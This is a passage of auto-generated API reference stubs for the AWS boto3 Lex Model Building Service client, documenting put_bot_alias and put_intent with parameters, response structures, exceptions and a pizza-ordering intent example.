:param conversationLogs: Settings for conversation logs for the alias.\n\nlogSettings (list) -- [REQUIRED]The settings for your conversation logs. You can log the conversation text, conversation audio, or both.\n\n(dict) --Settings used to configure delivery mode and destination for conversation logs.\n\nlogType (string) -- [REQUIRED]The type of logging to enable. Text logs are delivered to a CloudWatch Logs log group. Audio logs are delivered to an S3 bucket.\n\ndestination (string) -- [REQUIRED]Where the logs will be delivered. Text logs are delivered to a CloudWatch Logs log group. Audio logs are delivered to an S3 bucket.\n\nkmsKeyArn (string) --The Amazon Resource Name (ARN) of the AWS KMS customer managed key for encrypting audio logs delivered to an S3 bucket. The key does not apply to CloudWatch Logs and is optional for S3 buckets.\n\nresourceArn (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the CloudWatch Logs log group or S3 bucket where the logs should be delivered.\n\n\n\n\n\niamRoleArn (string) -- [REQUIRED]The Amazon Resource Name (ARN) of an IAM role with permission to write to your CloudWatch Logs for text logs and your S3 bucket for audio logs. If audio encryption is enabled, this role also provides access permission for the AWS KMS key used for encrypting audio logs. For more information, see Creating an IAM Role and Policy for Conversation Logs .\n\n\n
:type tags: list
:param tags: A list of tags to add to the bot alias. You can only add tags when you create an alias, you can\'t use the PutBotAlias operation to update the tags on a bot alias. To update tags, use the TagResource operation.\n\n(dict) --A list of key/value pairs that identify a bot, bot alias, or bot channel. Tag keys and values can consist of Unicode letters, digits, white space, and any of the following symbols: _ . : / = + - @.\n\nkey (string) -- [REQUIRED]The key for the tag. Keys are not case-sensitive and must be unique.\n\nvalue (string) -- [REQUIRED]The value associated with a key. The value may be an empty string but it can\'t be null.\n\n\n\n\n
:rtype: dict
Returns
Response Syntax
{
'name': 'string',
'description': 'string',
'botVersion': 'string',
'botName': 'string',
'lastUpdatedDate': datetime(2015, 1, 1),
'createdDate': datetime(2015, 1, 1),
'checksum': 'string',
'conversationLogs': {
'logSettings': [
{
'logType': 'AUDIO'|'TEXT',
'destination': 'CLOUDWATCH_LOGS'|'S3',
'kmsKeyArn': 'string',
'resourceArn': 'string',
'resourcePrefix': 'string'
},
],
'iamRoleArn': 'string'
},
'tags': [
{
'key': 'string',
'value': 'string'
},
]
}
Response Structure
(dict) --
name (string) --
The name of the alias.
description (string) --
A description of the alias.
botVersion (string) --
The version of the bot that the alias points to.
botName (string) --
The name of the bot that the alias points to.
lastUpdatedDate (datetime) --
The date that the bot alias was updated. When you create a resource, the creation date and the last updated date are the same.
createdDate (datetime) --
The date that the bot alias was created.
checksum (string) --
The checksum for the current version of the alias.
conversationLogs (dict) --
The settings that determine how Amazon Lex uses conversation logs for the alias.
logSettings (list) --
The settings for your conversation logs. You can log text, audio, or both.
(dict) --
The settings for conversation logs.
logType (string) --
The type of logging that is enabled.
destination (string) --
The destination where logs are delivered.
kmsKeyArn (string) --
The Amazon Resource Name (ARN) of the key used to encrypt audio logs in an S3 bucket.
resourceArn (string) --
The Amazon Resource Name (ARN) of the CloudWatch Logs log group or S3 bucket where the logs are delivered.
resourcePrefix (string) --
The resource prefix is the first part of the S3 object key within the S3 bucket that you specified to contain audio logs. For CloudWatch Logs it is the prefix of the log stream name within the log group that you specified.
iamRoleArn (string) --
The Amazon Resource Name (ARN) of the IAM role used to write your logs to CloudWatch Logs or an S3 bucket.
tags (list) --
A list of tags associated with a bot.
(dict) --
A list of key/value pairs that identify a bot, bot alias, or bot channel. Tag keys and values can consist of Unicode letters, digits, white space, and any of the following symbols: _ . : / = + - @.
key (string) --
The key for the tag. Keys are not case-sensitive and must be unique.
value (string) --
The value associated with a key. The value may be an empty string but it can\'t be null.
Exceptions
LexModelBuildingService.Client.exceptions.ConflictException
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
LexModelBuildingService.Client.exceptions.PreconditionFailedException
:return: {
'name': 'string',
'description': 'string',
'botVersion': 'string',
'botName': 'string',
'lastUpdatedDate': datetime(2015, 1, 1),
'createdDate': datetime(2015, 1, 1),
'checksum': 'string',
'conversationLogs': {
'logSettings': [
{
'logType': 'AUDIO'|'TEXT',
'destination': 'CLOUDWATCH_LOGS'|'S3',
'kmsKeyArn': 'string',
'resourceArn': 'string',
'resourcePrefix': 'string'
},
],
'iamRoleArn': 'string'
},
'tags': [
{
'key': 'string',
'value': 'string'
},
]
}
:returns:
LexModelBuildingService.Client.exceptions.ConflictException
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
LexModelBuildingService.Client.exceptions.PreconditionFailedException
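The checksum rules above imply a read-modify-write pattern: fetch the alias, carry its checksum into the update request. A hedged sketch (the client calls are commented out because they need AWS credentials and an existing bot; 'prod' and 'OrderPizzaBot' are placeholder names):

```python
# Read-modify-write pattern for updating a bot alias (sketch).
def build_update_request(existing_alias):
    """Build put_bot_alias kwargs that carry the current checksum forward."""
    return {
        'name': existing_alias['name'],
        'botName': existing_alias['botName'],
        'botVersion': existing_alias['botVersion'],
        # Passing the latest checksum avoids a PreconditionFailedException;
        # omitting it (or passing a stale one) on an update fails.
        'checksum': existing_alias['checksum'],
    }

# With a real client you would first fetch the alias:
# client = boto3.client('lex-models')
# existing = client.get_bot_alias(name='prod', botName='OrderPizzaBot')
existing = {  # stand-in for a get_bot_alias response
    'name': 'prod', 'botName': 'OrderPizzaBot',
    'botVersion': '1', 'checksum': 'abc123',
}
request = build_update_request(existing)
# client.put_bot_alias(**request)
```

For a create, the same kwargs would simply omit the checksum field.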
"""
pass
def put_intent(name=None, description=None, slots=None, sampleUtterances=None, confirmationPrompt=None, rejectionStatement=None, followUpPrompt=None, conclusionStatement=None, dialogCodeHook=None, fulfillmentActivity=None, parentIntentSignature=None, checksum=None, createVersion=None):
"""
Creates an intent or replaces an existing intent.
To define the interaction between the user and your bot, you use one or more intents. For a pizza ordering bot, for example, you would create an OrderPizza intent.
To create an intent or replace an existing intent, you must provide the intent name, sample utterances, the slots (the information to gather from the user), and how the intent is fulfilled.
You can specify other optional information in the request, such as a confirmation prompt, a conclusion statement, and a follow-up prompt.
If you specify an existing intent name to update the intent, Amazon Lex replaces the values in the $LATEST version of the intent with the values in the request. Amazon Lex removes fields that you don\'t provide in the request. If you don\'t specify the required fields, Amazon Lex throws an exception. When you update the $LATEST version of an intent, the status field of any bot that uses the $LATEST version of the intent is set to NOT_BUILT .
For more information, see how-it-works .
This operation requires permissions for the lex:PutIntent action.
See also: AWS API Documentation
Exceptions
Examples
This example shows how to create an intent for ordering pizzas.
Expected Output:
:example: response = client.put_intent(
name='string',
description='string',
slots=[
{
'name': 'string',
'description': 'string',
'slotConstraint': 'Required'|'Optional',
'slotType': 'string',
'slotTypeVersion': 'string',
'valueElicitationPrompt': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'maxAttempts': 123,
'responseCard': 'string'
},
'priority': 123,
'sampleUtterances': [
'string',
],
'responseCard': 'string',
'obfuscationSetting': 'NONE'|'DEFAULT_OBFUSCATION'
},
],
sampleUtterances=[
'string',
],
confirmationPrompt={
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'maxAttempts': 123,
'responseCard': 'string'
},
rejectionStatement={
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'responseCard': 'string'
},
followUpPrompt={
'prompt': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'maxAttempts': 123,
'responseCard': 'string'
},
'rejectionStatement': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'responseCard': 'string'
}
},
conclusionStatement={
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'responseCard': 'string'
},
dialogCodeHook={
'uri': 'string',
'messageVersion': 'string'
},
fulfillmentActivity={
'type': 'ReturnIntent'|'CodeHook',
'codeHook': {
'uri': 'string',
'messageVersion': 'string'
}
},
parentIntentSignature='string',
checksum='string',
createVersion=True|False
)
:type name: string
:param name: [REQUIRED]\nThe name of the intent. The name is not case sensitive.\nThe name can\'t match a built-in intent name, or a built-in intent name with 'AMAZON.' removed. For example, because there is a built-in intent called AMAZON.HelpIntent , you can\'t create a custom intent called HelpIntent .\nFor a list of built-in intents, see Standard Built-in Intents in the Alexa Skills Kit .\n
:type description: string
:param description: A description of the intent.
:type slots: list
:param slots: An array of intent slots. At runtime, Amazon Lex elicits required slot values from the user using prompts defined in the slots. For more information, see how-it-works .\n\n(dict) --Identifies the version of a specific slot.\n\nname (string) -- [REQUIRED]The name of the slot.\n\ndescription (string) --A description of the slot.\n\nslotConstraint (string) -- [REQUIRED]Specifies whether the slot is required or optional.\n\nslotType (string) --The type of the slot, either a custom slot type that you defined or one of the built-in slot types.\n\nslotTypeVersion (string) --The version of the slot type.\n\nvalueElicitationPrompt (dict) --The prompt that Amazon Lex uses to elicit the slot value from the user.\n\nmessages (list) -- [REQUIRED]An array of objects, each of which provides a message string and its type. You can specify the message string in plain text or in Speech Synthesis Markup Language (SSML).\n\n(dict) --The message object that provides the message text and its type.\n\ncontentType (string) -- [REQUIRED]The content type of the message string.\n\ncontent (string) -- [REQUIRED]The text of the message.\n\ngroupNumber (integer) --Identifies the message group that the message belongs to. When a group is assigned to a message, Amazon Lex returns one message from each group in the response.\n\n\n\n\n\nmaxAttempts (integer) -- [REQUIRED]The number of times to prompt the user for information.\n\nresponseCard (string) --A response card. Amazon Lex uses this prompt at runtime, in the PostText API response. It substitutes session attributes and slot values for placeholders in the response card. For more information, see ex-resp-card .\n\n\n\npriority (integer) --Specifies the order in which Amazon Lex elicits this slot value from the user. For example, if the intent has two slots with priorities 1 and 2, Amazon Lex first elicits a value for the slot with priority 1.\nIf multiple slots share the same priority, the order in which Amazon Lex elicits values is arbitrary.\n\nsampleUtterances (list) --If you know a specific pattern with which users might respond to an Amazon Lex request for a slot value, you can provide those utterances to improve accuracy. This is optional. In most cases, Amazon Lex is capable of understanding user utterances.\n\n(string) --\n\n\nresponseCard (string) --A set of possible responses for the slot type used by text-based clients. A user chooses an option from the response card, instead of using text to reply.\n\nobfuscationSetting (string) --Determines whether a slot is obfuscated in conversation logs and stored utterances. When you obfuscate a slot, the value is replaced by the slot name in curly braces ({}). For example, if the slot name is 'full_name', obfuscated values are replaced with '{full_name}'. For more information, see Slot Obfuscation .\n\n\n\n\n
:type sampleUtterances: list
:param sampleUtterances: An array of utterances (strings) that a user might say to signal the intent. For example, 'I want {PizzaSize} pizza', 'Order {Quantity} {PizzaSize} pizzas'.\nIn each utterance, a slot name is enclosed in curly braces.\n\n(string) --\n\n
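As the parameter description notes, a slot name is enclosed in curly braces inside each utterance. A small illustrative helper (not part of the Lex API) that extracts the slot names an utterance references:

```python
import re

def slot_names(utterance):
    """Return the slot names referenced by an utterance, e.g. '{PizzaSize}'."""
    return re.findall(r'\{(\w+)\}', utterance)

print(slot_names('Order {Quantity} {PizzaSize} pizzas'))  # ['Quantity', 'PizzaSize']
```

A check like this can catch utterances that reference slots missing from the slots array before the request is sent.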
:type confirmationPrompt: dict
:param confirmationPrompt: Prompts the user to confirm the intent. This question should have a yes or no answer.\nAmazon Lex uses this prompt to ensure that the user acknowledges that the intent is ready for fulfillment. For example, with the OrderPizza intent, you might want to confirm that the order is correct before placing it. For other intents, such as intents that simply respond to user questions, you might not need to ask the user for confirmation before providing the information.\n\nNote\nYou must provide both the rejectionStatement and the confirmationPrompt , or neither.\n\n\nmessages (list) -- [REQUIRED]An array of objects, each of which provides a message string and its type. You can specify the message string in plain text or in Speech Synthesis Markup Language (SSML).\n\n(dict) --The message object that provides the message text and its type.\n\ncontentType (string) -- [REQUIRED]The content type of the message string.\n\ncontent (string) -- [REQUIRED]The text of the message.\n\ngroupNumber (integer) --Identifies the message group that the message belongs to. When a group is assigned to a message, Amazon Lex returns one message from each group in the response.\n\n\n\n\n\nmaxAttempts (integer) -- [REQUIRED]The number of times to prompt the user for information.\n\nresponseCard (string) --A response card. Amazon Lex uses this prompt at runtime, in the PostText API response. It substitutes session attributes and slot values for placeholders in the response card. For more information, see ex-resp-card .\n\n\n
:type rejectionStatement: dict
:param rejectionStatement: When the user answers 'no' to the question defined in confirmationPrompt , Amazon Lex responds with this statement to acknowledge that the intent was canceled.\n\nNote\nYou must provide both the rejectionStatement and the confirmationPrompt , or neither.\n\n\nmessages (list) -- [REQUIRED]A collection of message objects.\n\n(dict) --The message object that provides the message text and its type.\n\ncontentType (string) -- [REQUIRED]The content type of the message string.\n\ncontent (string) -- [REQUIRED]The text of the message.\n\ngroupNumber (integer) --Identifies the message group that the message belongs to. When a group is assigned to a message, Amazon Lex returns one message from each group in the response.\n\n\n\n\n\nresponseCard (string) --At runtime, if the client is using the PostText API, Amazon Lex includes the response card in the response. It substitutes all of the session attributes and slot values for placeholders in the response card.\n\n\n
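Because confirmationPrompt and rejectionStatement must be supplied together or not at all, an illustrative client-side check (not part of the API; the service itself enforces this rule with a BadRequestException) can fail fast before the call:

```python
def validate_confirmation_pair(kwargs):
    """Raise early if only one of confirmationPrompt/rejectionStatement is set.

    Illustrative pre-flight check; the service enforces the same rule.
    """
    has_prompt = 'confirmationPrompt' in kwargs
    has_rejection = 'rejectionStatement' in kwargs
    if has_prompt != has_rejection:
        raise ValueError(
            'confirmationPrompt and rejectionStatement must be provided '
            'together, or neither.')

validate_confirmation_pair({})  # neither present: OK
try:
    validate_confirmation_pair({'confirmationPrompt': {}})
except ValueError:
    pass  # only one of the pair: rejected
```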
:type followUpPrompt: dict
:param followUpPrompt: Amazon Lex uses this prompt to solicit additional activity after fulfilling an intent. For example, after the OrderPizza intent is fulfilled, you might prompt the user to order a drink.\nThe action that Amazon Lex takes depends on the user\'s response, as follows:\n\nIf the user says 'Yes' it responds with the clarification prompt that is configured for the bot.\nIf the user says 'Yes' and continues with an utterance that triggers an intent it starts a conversation for the intent.\nIf the user says 'No' it responds with the rejection statement configured for the follow-up prompt.\nIf it doesn\'t recognize the utterance it repeats the follow-up prompt.\n\nThe followUpPrompt field and the conclusionStatement field are mutually exclusive. You can specify only one.\n\nprompt (dict) -- [REQUIRED]Prompts for information from the user.\n\nmessages (list) -- [REQUIRED]An array of objects, each of which provides a message string and its type. You can specify the message string in plain text or in Speech Synthesis Markup Language (SSML).\n\n(dict) --The message object that provides the message text and its type.\n\ncontentType (string) -- [REQUIRED]The content type of the message string.\n\ncontent (string) -- [REQUIRED]The text of the message.\n\ngroupNumber (integer) --Identifies the message group that the message belongs to. When a group is assigned to a message, Amazon Lex returns one message from each group in the response.\n\n\n\n\n\nmaxAttempts (integer) -- [REQUIRED]The number of times to prompt the user for information.\n\nresponseCard (string) --A response card. Amazon Lex uses this prompt at runtime, in the PostText API response. It substitutes session attributes and slot values for placeholders in the response card. For more information, see ex-resp-card .\n\n\n\nrejectionStatement (dict) -- [REQUIRED]If the user answers 'no' to the question defined in the prompt field, Amazon Lex responds with this statement to acknowledge that the intent was canceled.\n\nmessages (list) -- [REQUIRED]A collection of message objects.\n\n(dict) --The message object that provides the message text and its type.\n\ncontentType (string) -- [REQUIRED]The content type of the message string.\n\ncontent (string) -- [REQUIRED]The text of the message.\n\ngroupNumber (integer) --Identifies the message group that the message belongs to. When a group is assigned to a message, Amazon Lex returns one message from each group in the response.\n\n\n\n\n\nresponseCard (string) --At runtime, if the client is using the PostText API, Amazon Lex includes the response card in the response. It substitutes all of the session attributes and slot values for placeholders in the response card.\n\n\n\n\n
:type conclusionStatement: dict
:param conclusionStatement: The statement that you want Amazon Lex to convey to the user after the intent is successfully fulfilled by the Lambda function.\nThis element is relevant only if you provide a Lambda function in the fulfillmentActivity . If you return the intent to the client application, you can\'t specify this element.\n\nNote\nThe followUpPrompt and conclusionStatement are mutually exclusive. You can specify only one.\n\n\nmessages (list) -- [REQUIRED]A collection of message objects.\n\n(dict) --The message object that provides the message text and its type.\n\ncontentType (string) -- [REQUIRED]The content type of the message string.\n\ncontent (string) -- [REQUIRED]The text of the message.\n\ngroupNumber (integer) --Identifies the message group that the message belongs to. When a group is assigned to a message, Amazon Lex returns one message from each group in the response.\n\n\n\n\n\nresponseCard (string) --At runtime, if the client is using the PostText API, Amazon Lex includes the response card in the response. It substitutes all of the session attributes and slot values for placeholders in the response card.\n\n\n
:type dialogCodeHook: dict
:param dialogCodeHook: Specifies a Lambda function to invoke for each user input. You can invoke this Lambda function to personalize user interaction.\nFor example, suppose your bot determines that the user is John. Your Lambda function might retrieve John\'s information from a backend database and prepopulate some of the values. For example, if you find that John is gluten intolerant, you might set the corresponding intent slot, GlutenIntolerant , to true. You might find John\'s phone number and set the corresponding session attribute.\n\nuri (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the Lambda function.\n\nmessageVersion (string) -- [REQUIRED]The version of the request-response that you want Amazon Lex to use to invoke your Lambda function. For more information, see using-lambda .\n\n\n
:type fulfillmentActivity: dict
:param fulfillmentActivity: Required. Describes how the intent is fulfilled. For example, after a user provides all of the information for a pizza order, fulfillmentActivity defines how the bot places an order with a local pizza store.\nYou might configure Amazon Lex to return all of the intent information to the client application, or direct it to invoke a Lambda function that can process the intent (for example, place an order with a pizzeria).\n\ntype (string) -- [REQUIRED]How the intent should be fulfilled, either by running a Lambda function or by returning the slot data to the client application.\n\ncodeHook (dict) --A description of the Lambda function that is run to fulfill the intent.\n\nuri (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the Lambda function.\n\nmessageVersion (string) -- [REQUIRED]The version of the request-response that you want Amazon Lex to use to invoke your Lambda function. For more information, see using-lambda .\n\n\n\n\n
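The two fulfillment modes described above look like this as parameter values; the Lambda ARN and messageVersion below are placeholder assumptions:

```python
# Mode 1: return the slot data to the client application.
return_intent = {'type': 'ReturnIntent'}

# Mode 2: invoke a Lambda function to process the intent.
# The ARN and messageVersion are placeholder assumptions.
code_hook = {
    'type': 'CodeHook',
    'codeHook': {
        'uri': 'arn:aws:lambda:us-east-1:123456789012:function:OrderPizzaHandler',
        'messageVersion': '1.0',
    },
}
```

The codeHook field is only meaningful (and required) when type is 'CodeHook'.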
:type parentIntentSignature: string
:param parentIntentSignature: A unique identifier for the built-in intent to base this intent on. To find the signature for an intent, see Standard Built-in Intents in the Alexa Skills Kit .
:type checksum: string
:param checksum: Identifies a specific revision of the $LATEST version.\nWhen you create a new intent, leave the checksum field blank. If you specify a checksum you get a BadRequestException exception.\nWhen you want to update an intent, set the checksum field to the checksum of the most recent revision of the $LATEST version. If you don\'t specify the checksum field, or if the checksum does not match the $LATEST version, you get a PreconditionFailedException exception.\n
:type createVersion: boolean
:param createVersion: When set to true a new numbered version of the intent is created. This is the same as calling the CreateIntentVersion operation. If you do not specify createVersion , the default is false .
:rtype: dict
Returns
Response Syntax
{
'name': 'string',
'description': 'string',
'slots': [
{
'name': 'string',
'description': 'string',
'slotConstraint': 'Required'|'Optional',
'slotType': 'string',
'slotTypeVersion': 'string',
'valueElicitationPrompt': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'maxAttempts': 123,
'responseCard': 'string'
},
'priority': 123,
'sampleUtterances': [
'string',
],
'responseCard': 'string',
'obfuscationSetting': 'NONE'|'DEFAULT_OBFUSCATION'
},
],
'sampleUtterances': [
'string',
],
'confirmationPrompt': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'maxAttempts': 123,
'responseCard': 'string'
},
'rejectionStatement': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'responseCard': 'string'
},
'followUpPrompt': {
'prompt': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'maxAttempts': 123,
'responseCard': 'string'
},
'rejectionStatement': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'responseCard': 'string'
}
},
'conclusionStatement': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'responseCard': 'string'
},
'dialogCodeHook': {
'uri': 'string',
'messageVersion': 'string'
},
'fulfillmentActivity': {
'type': 'ReturnIntent'|'CodeHook',
'codeHook': {
'uri': 'string',
'messageVersion': 'string'
}
},
'parentIntentSignature': 'string',
'lastUpdatedDate': datetime(2015, 1, 1),
'createdDate': datetime(2015, 1, 1),
'version': 'string',
'checksum': 'string',
'createVersion': True|False
}
Response Structure
(dict) --
name (string) --
The name of the intent.
description (string) --
A description of the intent.
slots (list) --
An array of intent slots that are configured for the intent.
(dict) --
Identifies the version of a specific slot.
name (string) --
The name of the slot.
description (string) --
A description of the slot.
slotConstraint (string) --
Specifies whether the slot is required or optional.
slotType (string) --
The type of the slot, either a custom slot type that you defined or one of the built-in slot types.
slotTypeVersion (string) --
The version of the slot type.
valueElicitationPrompt (dict) --
The prompt that Amazon Lex uses to elicit the slot value from the user.
messages (list) --
An array of objects, each of which provides a message string and its type. You can specify the message string in plain text or in Speech Synthesis Markup Language (SSML).
(dict) --
The message object that provides the message text and its type.
contentType (string) --
The content type of the message string.
content (string) --
The text of the message.
groupNumber (integer) --
Identifies the message group that the message belongs to. When a group is assigned to a message, Amazon Lex returns one message from each group in the response.
maxAttempts (integer) --
The number of times to prompt the user for information.
responseCard (string) --
A response card. Amazon Lex uses this prompt at runtime, in the PostText API response. It substitutes session attributes and slot values for placeholders in the response card. For more information, see ex-resp-card .
priority (integer) --
Specifies the order in which Amazon Lex elicits this slot value from the user. For example, if the intent has two slots with priorities 1 and 2, Amazon Lex first elicits a value for the slot with priority 1.
If multiple slots share the same priority, the order in which Amazon Lex elicits values is arbitrary.
sampleUtterances (list) --
If you know a specific pattern with which users might respond to an Amazon Lex request for a slot value, you can provide those utterances to improve accuracy. This is optional. In most cases, Amazon Lex is capable of understanding user utterances.
(string) --
responseCard (string) --
A set of possible responses for the slot type used by text-based clients. A user chooses an option from the response card, instead of using text to reply.
obfuscationSetting (string) --
Determines whether a slot is obfuscated in conversation logs and stored utterances. When you obfuscate a slot, the value is replaced by the slot name in curly braces ({}). For example, if the slot name is "full_name", obfuscated values are replaced with "{full_name}". For more information, see Slot Obfuscation .
sampleUtterances (list) --
An array of sample utterances that are configured for the intent.
(string) --
confirmationPrompt (dict) --
If defined in the intent, Amazon Lex prompts the user to confirm the intent before fulfilling it.
messages (list) --
An array of objects, each of which provides a message string and its type. You can specify the message string in plain text or in Speech Synthesis Markup Language (SSML).
(dict) --
The message object that provides the message text and its type.
contentType (string) --
The content type of the message string.
content (string) --
The text of the message.
groupNumber (integer) --
Identifies the message group that the message belongs to. When a group is assigned to a message, Amazon Lex returns one message from each group in the response.
maxAttempts (integer) --
The number of times to prompt the user for information.
responseCard (string) --
A response card. Amazon Lex uses this prompt at runtime, in the PostText API response. It substitutes session attributes and slot values for placeholders in the response card. For more information, see ex-resp-card .
rejectionStatement (dict) --
If the user answers "no" to the question defined in confirmationPrompt Amazon Lex responds with this statement to acknowledge that the intent was canceled.
messages (list) --
A collection of message objects.
(dict) --
The message object that provides the message text and its type.
contentType (string) --
The content type of the message string.
content (string) --
The text of the message.
groupNumber (integer) --
Identifies the message group that the message belongs to. When a group is assigned to a message, Amazon Lex returns one message from each group in the response.
responseCard (string) --
At runtime, if the client is using the PostText API, Amazon Lex includes the response card in the response. It substitutes all of the session attributes and slot values for placeholders in the response card.
followUpPrompt (dict) --
If defined in the intent, Amazon Lex uses this prompt to solicit additional user activity after the intent is fulfilled.
prompt (dict) --
Prompts for information from the user.
messages (list) --
An array of objects, each of which provides a message string and its type. You can specify the message string in plain text or in Speech Synthesis Markup Language (SSML).
(dict) --
The message object that provides the message text and its type.
contentType (string) --
The content type of the message string.
content (string) --
The text of the message.
groupNumber (integer) --
Identifies the message group that the message belongs to. When a group is assigned to a message, Amazon Lex returns one message from each group in the response.
maxAttempts (integer) --
The number of times to prompt the user for information.
responseCard (string) --
A response card. Amazon Lex uses this prompt at runtime, in the PostText API response. It substitutes session attributes and slot values for placeholders in the response card. For more information, see ex-resp-card .
rejectionStatement (dict) --
If the user answers "no" to the question defined in the prompt field, Amazon Lex responds with this statement to acknowledge that the intent was canceled.
messages (list) --
A collection of message objects.
(dict) --
The message object that provides the message text and its type.
contentType (string) --
The content type of the message string.
content (string) --
The text of the message.
groupNumber (integer) --
Identifies the message group that the message belongs to. When a group is assigned to a message, Amazon Lex returns one message from each group in the response.
responseCard (string) --
At runtime, if the client is using the PostText API, Amazon Lex includes the response card in the response. It substitutes all of the session attributes and slot values for placeholders in the response card.
conclusionStatement (dict) --
After the Lambda function specified in the ``fulfillmentActivity`` field fulfills the intent, Amazon Lex conveys this statement to the user.
messages (list) --
A collection of message objects.
(dict) --
The message object that provides the message text and its type.
contentType (string) --
The content type of the message string.
content (string) --
The text of the message.
groupNumber (integer) --
Identifies the message group that the message belongs to. When a group is assigned to a message, Amazon Lex returns one message from each group in the response.
responseCard (string) --
At runtime, if the client is using the PostText API, Amazon Lex includes the response card in the response. It substitutes all of the session attributes and slot values for placeholders in the response card.
dialogCodeHook (dict) --
If defined in the intent, Amazon Lex invokes this Lambda function for each user input.
uri (string) --
The Amazon Resource Name (ARN) of the Lambda function.
messageVersion (string) --
The version of the request-response that you want Amazon Lex to use to invoke your Lambda function. For more information, see using-lambda .
fulfillmentActivity (dict) --
If defined in the intent, Amazon Lex invokes this Lambda function to fulfill the intent after the user provides all of the information required by the intent.
type (string) --
How the intent should be fulfilled, either by running a Lambda function or by returning the slot data to the client application.
codeHook (dict) --
A description of the Lambda function that is run to fulfill the intent.
uri (string) --
The Amazon Resource Name (ARN) of the Lambda function.
messageVersion (string) --
The version of the request-response that you want Amazon Lex to use to invoke your Lambda function. For more information, see using-lambda .
parentIntentSignature (string) --
A unique identifier for the built-in intent that this intent is based on.
lastUpdatedDate (datetime) --
The date that the intent was updated. When you create a resource, the creation date and last update dates are the same.
createdDate (datetime) --
The date that the intent was created.
version (string) --
The version of the intent. For a new intent, the version is always $LATEST .
checksum (string) --
Checksum of the $LATEST version of the intent created or updated.
createVersion (boolean) --
True if a new version of the intent was created. If the createVersion field was not specified in the request, the createVersion field is set to false in the response.
Exceptions
LexModelBuildingService.Client.exceptions.ConflictException
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
LexModelBuildingService.Client.exceptions.PreconditionFailedException
Examples
This example shows how to create an intent for ordering pizzas.
response = client.put_intent(
name='DocOrderPizza',
conclusionStatement={
'messages': [
{
'content': 'All right, I ordered you a {Crust} crust {Type} pizza with {Sauce} sauce.',
'contentType': 'PlainText',
},
{
'content': 'OK, your {Crust} crust {Type} pizza with {Sauce} sauce is on the way.',
'contentType': 'PlainText',
},
],
'responseCard': 'foo',
},
confirmationPrompt={
'maxAttempts': 1,
'messages': [
{
'content': 'Should I order your {Crust} crust {Type} pizza with {Sauce} sauce?',
'contentType': 'PlainText',
},
],
},
description='Order a pizza from a local pizzeria.',
fulfillmentActivity={
'type': 'ReturnIntent',
},
rejectionStatement={
'messages': [
{
'content': "Ok, I'll cancel your order.",
'contentType': 'PlainText',
},
{
'content': 'I cancelled your order.',
'contentType': 'PlainText',
},
],
},
sampleUtterances=[
'Order me a pizza.',
'Order me a {Type} pizza.',
'I want a {Crust} crust {Type} pizza',
'I want a {Crust} crust {Type} pizza with {Sauce} sauce.',
],
slots=[
{
'name': 'Type',
'description': 'The type of pizza to order.',
'priority': 1,
'sampleUtterances': [
'Get me a {Type} pizza.',
'A {Type} pizza please.',
"I'd like a {Type} pizza.",
],
'slotConstraint': 'Required',
'slotType': 'DocPizzaType',
'slotTypeVersion': '$LATEST',
'valueElicitationPrompt': {
'maxAttempts': 1,
'messages': [
{
'content': 'What type of pizza would you like?',
'contentType': 'PlainText',
},
{
'content': 'Vegie or cheese pizza?',
'contentType': 'PlainText',
},
{
'content': 'I can get you a vegie or a cheese pizza.',
'contentType': 'PlainText',
},
],
},
},
{
'name': 'Crust',
'description': 'The type of pizza crust to order.',
'priority': 2,
'sampleUtterances': [
'Make it a {Crust} crust.',
"I'd like a {Crust} crust.",
],
'slotConstraint': 'Required',
'slotType': 'DocPizzaCrustType',
'slotTypeVersion': '$LATEST',
'valueElicitationPrompt': {
'maxAttempts': 1,
'messages': [
{
'content': 'What type of crust would you like?',
'contentType': 'PlainText',
},
{
'content': 'Thick or thin crust?',
'contentType': 'PlainText',
},
],
},
},
{
'name': 'Sauce',
'description': 'The type of sauce to use on the pizza.',
'priority': 3,
'sampleUtterances': [
'Make it {Sauce} sauce.',
"I'd like {Sauce} sauce.",
],
'slotConstraint': 'Required',
'slotType': 'DocPizzaSauceType',
'slotTypeVersion': '$LATEST',
'valueElicitationPrompt': {
'maxAttempts': 1,
'messages': [
{
'content': 'White or red sauce?',
'contentType': 'PlainText',
},
{
'content': 'Garlic or tomato sauce?',
'contentType': 'PlainText',
},
],
},
},
],
)
print(response)
Expected Output:
{
'version': '$LATEST',
'name': 'DocOrderPizza',
'checksum': 'ca9bc13d-afc8-4706-bbaf-091f7a5935d6',
'conclusionStatement': {
'messages': [
{
'content': 'All right, I ordered you a {Crust} crust {Type} pizza with {Sauce} sauce.',
'contentType': 'PlainText',
},
{
'content': 'OK, your {Crust} crust {Type} pizza with {Sauce} sauce is on the way.',
